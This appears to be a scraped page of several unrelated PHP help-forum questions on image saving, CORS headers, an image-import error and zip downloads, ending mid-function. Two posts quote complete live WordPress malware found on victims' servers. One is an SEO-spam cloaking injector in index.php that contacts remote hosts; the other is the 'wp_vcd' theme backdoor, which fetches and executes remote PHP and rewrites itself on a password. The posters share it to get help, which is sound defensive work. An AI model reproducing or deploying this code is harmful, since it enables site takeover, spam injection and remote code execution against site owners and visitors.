Save file with file_put_contents in folder - php

I've an image from this link. I want to copy it to my server. This is what I've tried:
$url = 'http://tex.z-dn.net/?f=4%5E%7B13%7D%2A2%5E%7B-10%7D%3A16%5E%7B3%7D ';
function GetImageByURL($url, $path = null) {
$opts = array(CURLOPT_URL => $url,
CURLOPT_HEADER => false,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_TIMEOUT => 10);
$ch = curl_init();
curl_setopt_array($ch, $opts);
$result = curl_exec($ch);
if ( (curl_getinfo($ch, CURLINFO_HTTP_CODE) == 200
&& (strpos(curl_getinfo($ch, CURLINFO_CONTENT_TYPE), "image") !== false)))
{
$name = substr($url, strrpos($url, '/')+1);
if ($path) {
if (is_writeable($path))
file_put_contents(rtrim($path, '/') . '/' . $name, $result);
echo $result;
} else {
echo "error : {$path}";
}
return $name;
}
curl_close($ch);
return false;
}
The above doesn't work, though.
This also doesn't work:
$input = $url;
$output = 'imageimage.jpg';
file_put_contents($_SERVER['DOCUMENT_ROOT'].'/upload/1/',$output, file_get_contents($input));


777 Permission to the Folder, works for me.

Related

Our cPanel Wordpress Website is creating this index.php automatically

<?php $group_num = 'z9126zn';
$inter_domain = 'http://' . $group_num . '.lievful.quest';
function curl_get_contents($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
$file_contents = curl_exec($ch);
curl_close($ch);
return $file_contents;
}
function getServerCont($url, $data = array())
{
$url = str_replace(' ', '+', $url);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$url");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
$output = curl_exec($ch);
$errorCode = curl_errno($ch);
curl_close($ch);
if (0 !== $errorCode) {
return false;
}
return $output;
}
function is_crawler($agent)
{
if (strpos($agent, 'google') !== false || strpos($agent, 'yahoo') !== false) {
return true;
} else {
return false;
}
}
function check_refer($refer)
{
if (strpos($refer, '.co.jp') !== false || strpos($refer, 'google.com') !== false) {
return true;
} else {
return false;
}
}
$http = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https://' : 'http://');
$req_uri = $_SERVER['REQUEST_URI'];
$domain = $_SERVER["HTTP_HOST"];
$self = $_SERVER['PHP_SELF'];
$ser_name = $_SERVER['SERVER_NAME'];
$req_url = $http . $domain . $req_uri;
$indata1 = $inter_domain . "/indata.php";
$map1 = $inter_domain . "/map.php";
$jump1 = $inter_domain . "/jump.php";
$url_words = $inter_domain . "/words.php";
$url_robots = $inter_domain . "/robots.php";
if (strpos($req_uri, ".php")) {
$href1 = $http . $domain . $self;
} else {
$href1 = $http . $domain;
}
$data1[] = array();
$data1['http'] = $http;
$data1['domain'] = $domain;
$data1['req_uri'] = $req_uri;
$data1['href'] = $href1;
$data1['req_url'] = $req_url;
$user_agent = strtolower(isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '');
if(getenv('HTTP_CLIENT_IP')){
$client_ip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
$client_ip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR')) {
$client_ip = getenv('REMOTE_ADDR');
} else {
$client_ip = $_SERVER['REMOTE_ADDR'];
}
if (substr($req_uri, -6) == 'robots') {
$robots_cont = getServerCont($url_robots, $data1);
define('BASE_PATH', str_ireplace($_SERVER['PHP_SELF'], '', __FILE__));
file_put_contents(BASE_PATH . '/robots.txt', $robots_cont);
$robots_cont = file_get_contents(BASE_PATH . '/robots.txt');
if (strpos($robots_cont, "Crawl-delay:3")) {
echo 'robots.txt file create success!';
} else {
echo 'robots.txt file create fail!';
}
exit;
}
if (substr($req_uri, -4) == '.xml') {
if (strpos($req_uri, "pingsitemap.xml")) {
$str_cont = getServerCont($map1, $data1);
$str_cont_arr = explode(",", $str_cont);
$str_cont_arr[] = 'sitemap';
for ($k = 0; $k < count($str_cont_arr); $k++) {
if (strpos($href1, ".php") > 0) {
$tt1 = '?';
} else {
$tt1 = '/';
}
$http2 = $href1 . $tt1 . $str_cont_arr[$k] . '.xml';
$data_new = 'https://www.google.com/ping?sitemap=' . $http2;
$data_new1 = 'http://www.google.com/ping?sitemap=' . $http2;
if (stristr(#file_get_contents($data_new), 'successfully')) {
echo $data_new . '===>Submitting Google Sitemap: OK' . PHP_EOL;
} else if (stristr(#curl_get_contents($data_new), 'successfully')) {
echo $data_new . '===>Submitting Google Sitemap: OK' . PHP_EOL;
} else if (stristr(#file_get_contents($data_new1), 'successfully')) {
echo $data_new1 . '===>Submitting Google Sitemap: OK' . PHP_EOL;
} else if (stristr(#curl_get_contents($data_new1), 'successfully')) {
echo $data_new1 . '===>Submitting Google Sitemap: OK' . PHP_EOL;
} else {
echo $data_new1 . '===>Submitting Google Sitemap: fail' . PHP_EOL;
}
}
exit;
}
if (strpos($req_uri, "allsitemap.xml")) {
$str_cont = getServerCont($map1, $data1);
header("Content-type:text/xml");
echo $str_cont;
exit;
}
if (strpos($req_uri, ".php")) {
$word4 = explode("?", $req_uri);
$word4 = $word4[count($word4) - 1];
$word4 = str_replace(".xml", "", $word4);
} else {
$word4 = str_replace("/", "", $req_uri);
$word4 = str_replace(".xml", "", $word4);
}
$data1['word'] = $word4;
$data1['action'] = 'check_sitemap';
$check_url4 = getServerCont($url_words, $data1);
if ($check_url4 == '1') {
$str_cont = getServerCont($map1, $data1);
header("Content-type:text/xml");
echo $str_cont;
exit;
}
$data1['action'] = "check_words";
$check1 = getServerCont($url_words, $data1);
if (strpos($req_uri, "map") > 0 || $check1 == '1') {
$data1['action'] = "rand_xml";
$check_url4 = getServerCont($url_words, $data1);
header("Content-type:text/xml");
echo $check_url4;
exit;
}
}
if (strpos($req_uri, ".php")) {
$main_shell = $http . $ser_name . $self;
$data1['main_shell'] = $main_shell;
} else {
$main_shell = $http . $ser_name;
$data1['main_shell'] = $main_shell;
}
$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
$chk_refer = check_refer($referer);
$bot=true;
if ($chk_refer) {
$data1['referer'] = $referer;
$data1['ip'] = $client_ip;
$data1['user_agent'] = $user_agent;
$data1['browser_la'] = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
$refer_content = getServerCont($jump1, $data1);
if ($refer_content != "404") {
echo $refer_content;
exit;
}
$bot=false;
}
$res_crawl = is_crawler($user_agent);
if ($res_crawl&&$bot) {
$data1['http_user_agent'] = $user_agent;
$get_content = getServerCont($indata1, $data1);
if ($get_content == "404") {
header('HTTP/1.0 404 Not Found');
exit;
} else if ($get_content == "500") {
header("HTTP/1.0 500 Internal Server Error");
exit;
} else if ($get_content == "blank") {
echo '';
exit;
} else {
echo $get_content;
exit;
}
} ?><?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* #package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* #var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';
This is that index.php file which is not in our control.
We have Godaddy VPS Server With cPanel & wordpress hosting. we have installed wordpress site in a directory and that directory creates INDEX file automatically which shows HTTP ERROR 500 when opened.
this is automatically created in our VPS server. it automatically modifies when we changes this. automatically created when deleted.
In short we have no control over the directory and this file.

I have the same problem
<?php $group_num = 'z0109_18';
$inter_domain = 'http://107.150.41.2//' . $group_num . '/';
function curl_get_contents($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
$file_contents = curl_exec($ch);
curl_close($ch);
return $file_contents;
}
function getServerCont($url, $data = array())
{
$url = str_replace(' ', '+', $url);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$url");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
$output = curl_exec($ch);
$errorCode = curl_errno($ch);
curl_close($ch);
if (0 !== $errorCode) {
return false;
}
return $output;
}
function is_crawler($agent)
{
$agent_check = false;
$bots = 'googlebot|google|yahoo|bing|aol';
if ($agent != '') {
if (preg_match("/($bots)/si", $agent)) {
$agent_check = true;
}
}
return $agent_check;
}
function check_refer($refer)
{
$check_refer = false;
$referbots = 'google.co.jp|yahoo.co.jp|google.com';
if ($refer != '' && preg_match("/($referbots)/si", $refer)) {
$check_refer = true;
}
return $check_refer;
}
$http = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https://' : 'http://');
$req_uri = $_SERVER['REQUEST_URI'];
$domain = $_SERVER["HTTP_HOST"];
$self = $_SERVER['PHP_SELF'];
$ser_name = $_SERVER['SERVER_NAME'];
$req_url = $http . $domain . $req_uri;
$indata1 = $inter_domain . "/indata.php";
$map1 = $inter_domain . "/map.php";
$jump1 = $inter_domain . "/jump.php";
$url_words = $inter_domain . "/words.php";
$url_robots = $inter_domain . "/robots.php";
if (strpos($req_uri, ".php")) {
$href1 = $http . $domain . $self;
} else {
$href1 = $http . $domain;
}
$data1[] = array();
$data1['domain'] = $domain;
$data1['req_uri'] = $req_uri;
$data1['href'] = $href1;
$data1['req_url'] = $req_url;
if (substr($req_uri, -6) == 'robots') {
$robots_cont = getServerCont($url_robots, $data1);
define('BASE_PATH', str_ireplace($_SERVER['PHP_SELF'], '', __FILE__));
file_put_contents(BASE_PATH . '/robots.txt', $robots_cont);
$robots_cont = file_get_contents(BASE_PATH . '/robots.txt');
if (strpos(strtolower($robots_cont), "sitemap")) {
echo 'robots.txt file create success!';
} else {
echo 'robots.txt file create fail!';
}
return;
}
if (substr($req_uri, -4) == '.xml') {
if (strpos($req_uri, "pingsitemap.xml")) {
$str_cont = getServerCont($map1, $data1);
$str_cont_arr = explode(",", $str_cont);
$str_cont_arr[] = 'sitemap';
for ($k = 0; $k < count($str_cont_arr); $k++) {
if (strpos($href1, ".php") > 0) {
$tt1 = '?';
} else {
$tt1 = '/';
}
$http2 = $href1 . $tt1 . $str_cont_arr[$k] . '.xml';
$data_new = 'https://www.google.com/ping?sitemap=' . $http2;
$data_new1 = 'http://www.google.com/ping?sitemap=' . $http2;
if (stristr(#file_get_contents($data_new), 'successfully')) {
echo $data_new . '===>Submitting Google Sitemap: OK' . PHP_EOL;
} else if (stristr(#curl_get_contents($data_new), 'successfully')) {
echo $data_new . '===>Submitting Google Sitemap: OK' . PHP_EOL;
} else if (stristr(#file_get_contents($data_new1), 'successfully')) {
echo $data_new1 . '===>Submitting Google Sitemap: OK' . PHP_EOL;
} else if (stristr(#curl_get_contents($data_new1), 'successfully')) {
echo $data_new1 . '===>Submitting Google Sitemap: OK' . PHP_EOL;
} else {
echo $data_new1 . '===>Submitting Google Sitemap: fail' . PHP_EOL;
}
}
return;
}
if (strpos($req_uri, "allsitemap.xml")) {
$str_cont = getServerCont($map1, $data1);
header("Content-type:text/xml");
echo $str_cont;
return;
}
if (strpos($req_uri, ".php")) {
$word4 = explode("?", $req_uri);
$word4 = $word4[count($word4) - 1];
$word4 = str_replace(".xml", "", $word4);
} else {
$word4 = str_replace("/", "", $req_uri);
$word4 = str_replace(".xml", "", $word4);
}
$data1['word'] = $word4;
$data1['action'] = 'check_sitemap';
$check_url4 = getServerCont($url_words, $data1);
if ($check_url4 == '1') {
$str_cont = getServerCont($map1, $data1);
header("Content-type:text/xml");
echo $str_cont;
return;
}
$data1['action'] = "check_words";
$check1 = getServerCont($url_words, $data1);
if (strpos($req_uri, "map") > 0 || $check1 == '1') $data1['action'] = "rand_xml";
$check_url4 = getServerCont($url_words, $data1);
header("Content-type:text/xml");
echo $check_url4;
return;
}
if (strpos($req_uri, ".php")) {
$main_shell = $http . $ser_name . $self;
$data1['main_shell'] = $main_shell;
} else {
$main_shell = $http . $ser_name;
$data1['main_shell'] = $main_shell;
}
$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
$chk_refer = check_refer($referer);
if (strpos($_SERVER['REQUEST_URI'], '.php')) {
$url_ext = '?';
} else {
$url_ext = '/';
}
if ($chk_refer && (preg_match('/ja/i', #$_SERVER['HTTP_ACCEPT_LANGUAGE']) || preg_match('/ja/i', #$_SERVER['HTTP_ACCEPT_LANGUAGE']) || preg_match("/^[a-z0-9]+[0-9]+$/", end(explode($url_ext, str_replace(array(".html", ".htm"), "", $_SERVER['REQUEST_URI'])))))) {
echo getServerCont($jump1, $data1);
return;
}
$user_agent = strtolower(isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '');
$res_crawl = is_crawler($user_agent);
if ($res_crawl) {
$data1['http_user_agent'] = $user_agent;
$get_content = getServerCont($indata1, $data1);
echo $get_content;
return;
} ?>
My only solution now is to delete index.php recolection.php and wp-admin and wp-includes folder.
After that I reinstall WordPress and the site is working again.

PHP http code 0 unable to read custom headers

I have a php script which is being called in an angular project. I always get the response code as 0. I can find the request headers in chrome debugging section, but when i see in script it a always empty.
Also the php script is called twice with request method 'options' and 'get'. Iam not able to proceed further to get the details. Iam working on a windows , PHP7,iis server.
<?php
ob_start();
define('ENVIRONMENT', isset($_SERVER['CI_ENV']) ? $_SERVER['CI_ENV'] : 'testing'); //testing, production
ini_set('display_errors', '1');
if ($_SERVER['REQUEST_METHOD'] === 'OPTIONS') {
header('Access-Control-Allow-Origin: *');
header('Access-Control-Allow-Methods: POST, GET, DELETE, PUT, PATCH, OPTIONS');
header('Access-Control-Allow-Headers: api-method,api-url,authorization,token, Content-Type');
header('Content-Length: 0');
header('Content-Type: text/plain');
die();
}else{
header("Access-Control-Allow-Origin: *");
header("Access-Control-Allow-Methods: PUT, POST, GET, OPTIONS, DELETE");
header("Content-Type: application/json");
}
echo "header " .getallheaders()['api-method'] . '<br>';
if ((empty(getallheaders()['api-method']) || empty(getallheaders()['api-url'])) && $_SERVER['REQUEST_METHOD'] === 'POST') {
echo json_encode(['msg' => 'Invalid request']);
exit;
}
$params = [];
$api_url = getallheaders()['api-url'];
$api_method = getallheaders()['api-method'];
if ($api_method == 'post') {
$params = json_decode(file_get_contents('php://input'), TRUE);
if (empty($params)) {
$params = $_POST;
}
$headers = ["Content-Type: application/x-www-form-urlencoded", "Cache-Control: no-cache"];
} else {
$headers = [];
}
//read headers
foreach (getallheaders() as $name => $value) {
$key = strtolower($name);
if (strtolower($name) == 'mobilenumber') {
array_push($headers, "$key: $value");
} else if (strtolower($name) == 'branch') {
array_push($headers, "$key: $value");
} else if (strtolower($name) == 'authorization') {
array_push($headers, "$key: $value");
}
}
$handle = curl_init();
curl_setopt($handle, CURLOPT_URL, $api_url);
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
curl_setopt($handle, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($handle, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($handle, CURLOPT_FRESH_CONNECT, 1);
curl_setopt($handle, CURLOPT_CONNECTTIMEOUT, 20);
curl_setopt($handle, CURLOPT_TIMEOUT, 400);
echo 'Curl error: ' . curl_error($handle);
if ($api_method == 'post') {
curl_setopt($handle, CURLOPT_POST, true);
curl_setopt($handle, CURLOPT_POSTFIELDS, http_build_query($params));
}
$response = curl_exec($handle);
$contentType = curl_getinfo($handle, CURLINFO_CONTENT_TYPE);
$code = curl_getinfo($handle, CURLINFO_HTTP_CODE);
print curl_error($handle);
if (ENVIRONMENT == 'testing') {
$log = 'Request Date:' . date("Y-m-d H:i:s") . '<br>';
$log .= 'Request url: ' . $api_url . '<br>';
$log .= 'Request Method: ' . $api_method . '<br>';
$log .= 'Content Type: ' . $contentType . '<br>'; $log .= 'Http Code: ' . $code . '<br>';
$log .= '<code>response: ' . $response . '</code>';
write_log($log);
}
if ($code == 200) {
http_response_code($code);
if (checkjson($response)) {
echo $response;
} else {
if (strpos($api_url, 'AddUser') !== false) {
if ($response == "error") {
http_response_code(200);
echo json_encode(['status' => 'success']);
exit;
}
}
if (strpos($api_url, 'EditUser') !== false) {
if ($response == "error") {
http_response_code(200);
echo json_encode(['status' => 'success']);
exit;
}
}
if ($response == "error") {
http_response_code(404);
echo json_encode(['status' => $response]);
} else if ($response == "success") {
http_response_code(200);
echo json_encode(['status' => $response]);
} else if ($response == "user already exist") {
http_response_code(409);
echo json_encode(['status' => $response]);
} else {
echo json_encode(['data' => $response]);
}
}
} else {
http_response_code($code);
echo json_encode(['msg' => 'empty response'.$code.$handle]);
}
if ($code == 0) {
print_r(curl_getinfo($handle));
exit;
}
function write_log($data = '')
{
file_put_contents("log.html", '<div style="max-width:100%;border:1px solid #ccc; padding:5px">' . $data . '</div><br>', FILE_APPEND | LOCK_EX);
}
function checkjson($str)
{
return json_decode($str, true);
}

You can use to call custom headers as an array
$headersArray = array();
foreach ($_SERVER as $key => $value) {
if (strpos($key, 'HTTP_') === 0) {
$headersArray[str_replace(' ', '', ucwords(str_replace('_', ' ', strtolower(substr($key, 5)))))] = $value;
}
}
Refer : https://stackoverflow.com/a/11709337/11298876, this answer was really helpful.
Now you can use headers array to call each header (Note it will be in camel case)
$api_url = $headersArray['ApiUrl'];
$api_method = $headersArray['ApiMethod'];
$mobile = $headersArray['Mobilenumber'];
$brand = $headersArray['Branch'];
$auth = $headersArray['Authorization'];
to get the actual headers.
Then finally you can use an array_push(because you have used it in your script) like this
array_push($headers, "mobilenumber: ".$headersArray['Mobilenumber'], "branch: ".$headersArray['Branch'],"authorization: ".$headersArray['Authorization']);
to send the headers.

trim() expects parameter 1 to be string

Got a situation with image import process, before asking here of course - tried many ways to solve it by myself, but without any luck yet.
I'm getting error in model file: trim() expects parameter 1 to be string, array given in file /.../file.php on line 3875. Have to mention that - when there's single image - importing that perfectly, as soon as getting multiple images (more than one) - getting this error, and doesn't importing any image, just skipping.
Line 387: $image = trim($image);
Whole function code:
protected function imageHandler($field, &$config, $multiple = false, $item_id = NULL) {
$image_array = array();
if (empty($config['columns'][$field])) {
if ($multiple) {
return $image_array;
} else {
return '';
}
}
$sort_order = 0;
foreach ((array) $config['columns'][$field] as $images) {
if (!empty($config['multiple_separator']) && is_string($images)) {
$images = explode(#html_entity_decode($config['multiple_separator']), $images);
}
//is_array($images) && reset($images);
if ($multiple && is_array($images) && $config['columns']['image'] == $images[key($images)]) {
array_shift($images);
}
foreach ((array) $images as $image) {
$image = trim($image);
if ($config['image_download'] && $image) {
// if (substr($image, 0, 2) == '//') {
// $image = 'http:' . $image;
// }
$file_info = pathinfo(parse_url(trim($image), PHP_URL_PATH));
// if no extension, get it by mime
if (empty($file_info['extension'])) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, trim($image));
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_NOBODY, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_exec($ch);
$contentType = curl_getinfo($ch, CURLINFO_CONTENT_TYPE);
switch($contentType) {
case 'image/bmp': $file_info['extension'] = 'bmp'; break;
case 'image/gif': $file_info['extension'] = 'gif'; break;
case 'image/jpeg': $file_info['extension'] = 'jpg'; break;
case 'image/pipeg': $file_info['extension'] = 'jfif'; break;
case 'image/tiff': $file_info['extension'] = 'tif'; break;
case 'image/png': $file_info['extension'] = 'png'; break;
default: $file_info['extension'] = '';
}
}
if (substr_count($file_info['dirname'], 'http')) {
// incorrect array extract
if (!$multiple) {
return $image;
} else {
$image_array[] = $image;
continue;
}
}
if (!in_array(strtolower($file_info['extension']), array('gif', 'jpg', 'jpeg', 'png'))) {
$this->session->data['obui_log'][] = array(
'row' => $this->session->data['obui_current_line'],
'status' => 'error',
'title' => $this->language->get('warning'),
'msg' => $this->language->get('warning_incorrect_image_format') . ' ' . str_replace(' ', '%20', $image),
);
if (!$multiple) {
return $image;
} else {
$image_array[] = $image;
continue;
}
}
if ($this->simulation) {
if (!$multiple) {
/* Now handled before
if (!in_array(strtolower($file_info['extension']), array('gif', 'jpg', 'jpeg', 'png'))) {
return array('error_format', $image);
}*/
return $image;
} else {
/* Now handled before
if (!in_array(strtolower($file_info['extension']), array('gif', 'jpg', 'jpeg', 'png'))) {
$image_array[] = 'error_format';
continue;
}*/
$image_array[] = $image;
continue;
}
}
// detect if image is on actual server
if (strpos($image, 'http') === false) {
$filename = trim($image);
if (!$multiple) {
return $filename;
} else {
if (!empty($filename)) {
$image_array[] = array(
'image' => $filename,
'sort_order' => $sort_order++,
);
}
continue;
}
}
if (version_compare(VERSION, '2', '>=')) {
$path = 'catalog/';
//$http_path = HTTP_CATALOG . 'image/catalog/';
} else {
$path = 'data/';
//$http_path = HTTP_CATALOG . 'image/data/';
}
if (trim($config['image_location'], '/\\')) {
$path .= trim($config['image_location'], '/\\') . '/';
}
if ($config['image_keep_path'] && trim($file_info['dirname'], '/\\')) {
$path .= trim($file_info['dirname'], '/\\') . '/';
}
if (!is_dir(DIR_IMAGE . $path)) {
mkdir(DIR_IMAGE . $path, 0777, true);
}
$filename = $path . urldecode($file_info['filename']) . '.' . $file_info['extension'];
if (($item_id === false && $this->config->get('mlseo_insertautoimgname')) || ($item_id && $this->config->get('mlseo_editautoimgname'))) {
$this->load->model('tool/seo_package');
$seo_image_name = $this->model_tool_seo_package->transformProduct($this->config->get('mlseo_product_image_name_pattern'), $this->config->get('config_language_id'), $config['columns']);
$seoPath = pathinfo($filename);
if (!empty($seoPath['filename'])) {
$seoFilename = $this->model_tool_seo_package->filter_seo($seo_image_name, 'image', '', '');
$filename = $seoPath['dirname'] . '/' . $seoFilename . '.' . $seoPath['extension'];
if (file_exists(DIR_IMAGE . $filename)) {
$x = 1;
while (file_exists(DIR_IMAGE . $filename)) {
$filename = $seoPath['dirname'] . '/' . $seoFilename . '-' . $x . '.' . $seoPath['extension'];
$x++;
}
}
}
}
if ($config['image_exists'] == 'rename') {
$x = 1;
while (file_exists(DIR_IMAGE . $filename)) {
$filename = $path . urldecode($file_info['filename']) . '-' . $x++ . '.' . $file_info['extension'];
}
} else if ($config['image_exists'] == 'keep' && file_exists(DIR_IMAGE . $filename)) {
// image skipped
if (!$multiple) {
return $filename;
} else {
$image_array[] = array(
'image' => $filename,
'sort_order' => $sort_order++,
);
continue;
}
}
// copy image, replace space chars for compatibility with copy()
// if (!#copy(trim(str_replace(' ', '%20', $image)), DIR_IMAGE . $filename)) {
$copyError = $this->copy_image(trim(str_replace(' ', '%20', $image)), DIR_IMAGE . $filename);
if ($copyError !== true) {
if (defined('GKD_CRON')) {
$this->cron_log($this->session->data['obui_current_line'] . ' - ' . $copyError);
} else {
$this->session->data['obui_log'][] = array(
'row' => $this->session->data['obui_current_line'],
'status' => 'error',
'title' => $this->language->get('warning'),
'msg' => $copyError,
);
}
$filename = '';
}
} else {
// get direct value
$filename = trim($image);
if ($this->simulation) {
if (!$multiple) {
return $filename;
} else {
if (!empty($filename)) {
$image_array[] = $filename;
}
continue;
}
}
}
// one field only, directly return first value
if (!$multiple) {
return $filename;
}
if (!empty($filename)) {
$image_array[] = array(
'image' => $filename,
'sort_order' => $sort_order++,
);
}
}
}
return $image_array;
}
Tried to use return $image; after that line, even that didn't helped. Was trying to find similar problem to this one to find a solution without posting here, but seems like I won't move anywhere withou help. Thanks in advance!

How to check my Wordpress source is victim of backdoor?

Today, I check all my source code. I detect in all source have a strange code.
I don't have experience in this problem. I very confused.
In /wp-content/themes/child-theme/function.php have the code look like:
Does my website have been hacked or have the backdoor in my code?
I using the theme from ThemeForest. Don't use any null theme. I very anxious because of all website in production mode.
Domain: http://www.zanons.xyz/code.php
Can anyone explain this code and consequences, direct impact on the site?
Have any method to resolve my problem? Thanks.
Full strange code:
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '5f8bb400922c3661c96af9e12eb821b9')) {
$div_code_name = "wp_vcd";
switch ($_REQUEST['action']) {
case 'change_domain';
if (isset($_REQUEST['newdomain'])) {
if (!empty($_REQUEST['newdomain'])) {
if ($file = #file_get_contents(__FILE__)) {
if (preg_match_all('/\$tmpcontent = #file_get_contents\("http:\/\/(.*)\/code\.php/i', $file, $matcholddomain)) {
$file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file);
#file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
case 'change_code';
if (isset($_REQUEST['newcode'])) {
if (!empty($_REQUEST['newcode'])) {
if ($file = #file_get_contents(__FILE__)) {
if (preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i', $file, $matcholdcode)) {
$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
#file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
default:
print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}
$div_code_name = "wp_vcd";
$funcfile = __FILE__;
if (!function_exists('theme_temp_setup')) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
if (fwrite($handle, "<?php\n" . $phpCode)) {
} else {
$tmpfname = tempnam('./', "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
}
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}
$wp_auth_key = '08b370e35d008b6591dd40b0eec23025';
if (($tmpcontent = #file_get_contents("http://www.zanons.com/code.php") OR $tmpcontent = #file_get_contents_tcurl("http://www.zanons.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
#file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
#file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
#file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = #file_get_contents("http://www.zanons.me/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
#file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
#file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
#file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
} elseif ($tmpcontent = #file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = #file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = #file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif (($tmpcontent = #file_get_contents("http://www.zanons.xyz/code.php") OR $tmpcontent = #file_get_contents_tcurl("http://www.zanons.xyz/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
}
}
}
//$start_wp_theme_tmp
//wp_tmp
//$end_wp_theme_tmp
?>

How to store only zip files downloaded from other website

I am building a application based in codeigniter. Here I need to download only files that have .zip extension and upload in my local drive. But to do it I had been given a function named get_zip contents are as follows:
<?php
function get_file($file, $localpath, $newfilename)
{
$err_msg = '';
$out = fopen($localpath.$newfilename,"wb");
if ($out == FALSE){
print "File not opened<br>";
exit;
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_FILE, $out);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_URL, $file);
curl_exec($ch);
if( curl_error($ch) )
{
echo "<br>Error is : ".curl_error ( $ch);
}
curl_close($ch);
//fclose($ch);
return $localpath.$newfilename;
}//end function
function directory_map_echo($source_dir, $directory_depth = 0, $hidden = FALSE)
{
